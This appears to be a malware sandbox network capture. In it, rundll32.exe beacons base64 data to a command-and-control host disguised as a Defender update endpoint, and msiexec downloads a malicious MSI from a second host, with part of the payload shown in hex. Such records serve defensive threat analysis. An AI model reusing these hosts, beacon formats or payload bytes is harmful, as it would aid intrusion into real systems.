                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:59.294399977 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:58 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            49192.168.2.549823185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:59.554130077 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:13:00.998343945 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:13:00 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            50192.168.2.549824185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:13:01.273061991 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:13:02.758141041 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:13:02 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            51192.168.2.549825185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:13:03.080204964 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:13:04.500267029 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:13:04 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            52192.168.2.549826185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:13:04.756861925 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:13:06.207870960 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:13:05 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            53192.168.2.549827185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:13:06.476110935 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:13:07.931963921 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:13:07 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            54192.168.2.549828185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:13:08.219103098 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:13:09.700627089 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:13:09 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            55192.168.2.549829185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:13:09.959602118 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:13:11.500988960 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:13:11 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.549704104.21.40.34432876C:\Windows\System32\msiexec.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-06 21:11:04 UTC115OUTGET /klog.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            User-Agent: Windows Installer
                                            Host: axizlhop.life
                                            2024-12-06 21:11:05 UTC796INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:11:04 GMT
                                            Content-Type: application/x-msi
                                            Content-Length: 978944
                                            Connection: close
                                            X-Powered-By: PHP/8.1.29
                                            cf-cache-status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RslC3LNJsRNEHsMPjOXes0E5896GBhmXdheZ0gvX857pqcDdVpS9mYWV8BjwsP1Pf3%2FBdkrnKtTx6UzlKeXJJyx%2BgoAfyw59GL4hmPLSnErzeSEqkT37D%2FVCYCGTMYKH"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8edf442ecc8919c3-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=2050&min_rtt=2038&rtt_var=788&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=729&delivery_rate=1368322&cwnd=148&unsent_bytes=0&cid=4b53ebee64a75733&ts=797&x=0"
                                            2024-12-06 21:11:05 UTC573INData Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 03 00 fe ff 09 00 06 00 00 00 00 00 00 00 00 00 00 00 0f 00 00 00 01 00 00 00 00 00 00 00 00 10 00 00 03 00 00 00 05 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 44 00 00 00 ce 00 00 00 60 01 00 00 c1 01 00 00 15 02 00 00 16 02 00 00 17 02 00 00 18 02 00 00 19 02 00 00 1a 02 00 00 1b 02 00 00 08 00 00 00 2f 06 00 00 30 06 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                            Data Ascii: >D`/0
                                            2024-12-06 21:11:05 UTC1369INData Raw: 00 00 00 11 00 00 00 12 00 00 00 13 00 00 00 14 00 00 00 15 00 00 00 16 00 00 00 17 00 00 00 18 00 00 00 19 00 00 00 1a 00 00 00 1b 00 00 00 1c 00 00 00 1d 00 00 00 1e 00 00 00 1f 00 00 00 20 00 00 00 2b 00 00 00 22 00 00 00 23 00 00 00 24 00 00 00 25 00 00 00 26 00 00 00 27 00 00 00 28 00 00 00 29 00 00 00 2a 00 00 00 31 00 00 00 2c 00 00 00 2d 00 00 00 2e 00 00 00 2f 00 00 00 30 00 00 00 34 00 00 00 32 00 00 00 3a 00 00 00 3f 00 00 00 35 00 00 00 36 00 00 00 37 00 00 00 38 00 00 00 39 00 00 00 3e 00 00 00 3c 00 00 00 b8 01 00 00 3d 00 00 00 a1 01 00 00 8d 05 00 00 40 00 00 00 41 00 00 00 42 00 00 00 43 00 00 00 8b 05 00 00 fd ff ff ff 46 00 00 00 47 00 00 00 48 00 00 00 49 00 00 00 4a 00 00 00 4b 00 00 00 4c 00 00 00 4d 00 00 00 4e 00 00 00 4f 00 00 00
                                            Data Ascii: +"#$%&'()*1,-./042:?56789><=@ABCFGHIJKLMNO
                                            2024-12-06 21:11:05 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 00 02 01 11 00 00 00 0d 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 17 00 00 00 0c 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 04 00 00 00 05 00 00 00 06 00 00 00 07 00 00 00 08 00 00 00 09 00 00 00 0a 00 00 00 0b 00 00 00 0c 00 00 00 0d 00 00 00 0e 00 00 00 0f 00 00 00 10 00 00 00 11 00 00 00 12 00 00 00 13 00 00 00 14 00 00 00 15 00 00 00 fe ff ff ff 18 00 00 00 fe ff ff ff fe ff ff ff e8 01 00 00 1b 00 00 00 1c 00 00 00 1d 00 00 00 1e 00 00 00 1f 00 00 00 20 00 00 00 21 00 00 00 62 00 00 00 23 00 00 00 24 00 00 00 25 00 00 00 26
                                            Data Ascii: !b#$%&
                                            2024-12-06 21:11:05 UTC1369INData Raw: 00 85 00 3d 00 7d 00 0c 01 0d 00 75 00 43 00 22 00 d5 00 44 00 d8 00 da 00 01 00 08 00 46 00 53 00 67 00 01 00 07 00 5c 00 06 00 07 00 08 00 4d 00 ee 00 f0 00 f2 00 4b 00 ac 00 5a 00 79 00 50 00 37 00 57 00 56 00 05 00 8a 00 36 00 8c 00 8e 00 01 00 5a 00 37 00 92 00 94 00 58 00 b4 00 b6 00 8c 00 8e 00 01 00 6e 00 60 00 bd 00 bf 00 5a 00 50 00 62 00 63 00 66 00 ca 00 6e 00 30 00 cd 00 83 00 67 00 01 00 68 00 c2 00 c4 00 57 00 98 00 9f 00 6c 00 5a 00 50 00 57 00 98 00 06 00 07 00 57 00 98 00 9f 00 a1 00 07 00 a4 00 67 00 22 00 06 00 05 00 ac 00 af 00 b1 00 06 00 07 00 08 00 06 00 07 00 08 00 07 00 30 00 5a 00 79 00 50 00 37 00 5a 00 79 00 50 00 37 00 ec 00 5a 00 79 00 50 00 8a 00 36 00 8c 00 8e 00 37 00 94 00 01 01 03 01 05 01 0d 00 50 00 22 00 05 01 37 00
                                            Data Ascii: =}uC"DFSg\MKZyP7WV6Z7Xn`ZPbcfn0ghWlZPWWg"0ZyP7ZyP7ZyP67P"7
                                            2024-12-06 21:11:05 UTC1369INData Raw: 13 06 00 00 14 06 00 00 15 06 00 00 16 06 00 00 17 06 00 00 18 06 00 00 19 06 00 00 1b 06 00 00 1d 06 00 00 fe ff ff ff 1f 06 00 00 2e 06 00 00 2d 06 00 00 20 06 00 00 21 06 00 00 22 06 00 00 23 06 00 00 24 06 00 00 25 06 00 00 26 06 00 00 27 06 00 00 28 06 00 00 29 06 00 00 2a 06 00 00 2b 06 00 00 2c 06 00 00 fe ff ff ff fe ff ff ff fe ff ff ff fd ff ff ff fd ff ff ff 32 06 00 00 33 06 00 00 34 06 00 00 35 06 00 00 36 06 00 00 37 06 00 00 38 06 00 00 39 06 00 00 3a 06 00 00 3b 06 00 00 3c 06 00 00 3d 06 00 00 3e 06 00 00 3f 06 00 00 40 06 00 00 41 06 00 00 42 06 00 00 43 06 00 00 44 06 00 00 45 06 00 00 46 06 00 00 47 06 00 00 48 06 00 00 49 06 00 00 4a 06 00 00 4b 06 00 00 4c 06 00 00 4d 06 00 00 4e 06 00 00 4f 06 00 00 50 06 00 00 51 06 00 00 52 06 00
                                            Data Ascii: .- !"#$%&'()*+,23456789:;<=>?@ABCDEFGHIJKLMNOPQR
                                            2024-12-06 21:11:05 UTC1369INData Raw: 20 69 6e 76 61 6c 69 64 2c 20 74 68 65 20 65 6e 67 69 6e 65 20 77 69 6c 6c 20 74 65 72 6d 69 6e 61 74 65 2c 20 72 65 74 75 72 6e 69 6e 67 20 69 65 73 42 61 64 41 63 74 69 6f 6e 44 61 74 61 2e 54 65 78 74 53 74 79 6c 65 53 69 7a 65 54 68 65 20 73 69 7a 65 20 6f 66 20 74 68 65 20 66 6f 6e 74 20 75 73 65 64 2e 20 54 68 69 73 20 73 69 7a 65 20 69 73 20 67 69 76 65 6e 20 69 6e 20 6f 75 72 20 75 6e 69 74 73 20 28 31 2f 31 32 20 6f 66 20 74 68 65 20 73 79 73 74 65 6d 20 66 6f 6e 74 20 68 65 69 67 68 74 29 2e 20 41 73 73 75 6d 69 6e 67 20 74 68 61 74 20 74 68 65 20 73 79 73 74 65 6d 20 66 6f 6e 74 20 69 73 20 73 65 74 20 74 6f 20 31 32 20 70 6f 69 6e 74 20 73 69 7a 65 2c 20 74 68 69 73 20 69 73 20 65 71 75 69 76 61 6c 65 6e 74 20 74 6f 20 74 68 65 20 70 6f 69 6e
                                            Data Ascii: invalid, the engine will terminate, returning iesBadActionData.TextStyleSizeThe size of the font used. This size is given in our units (1/12 of the system font height). Assuming that the system font is set to 12 point size, this is equivalent to the poin
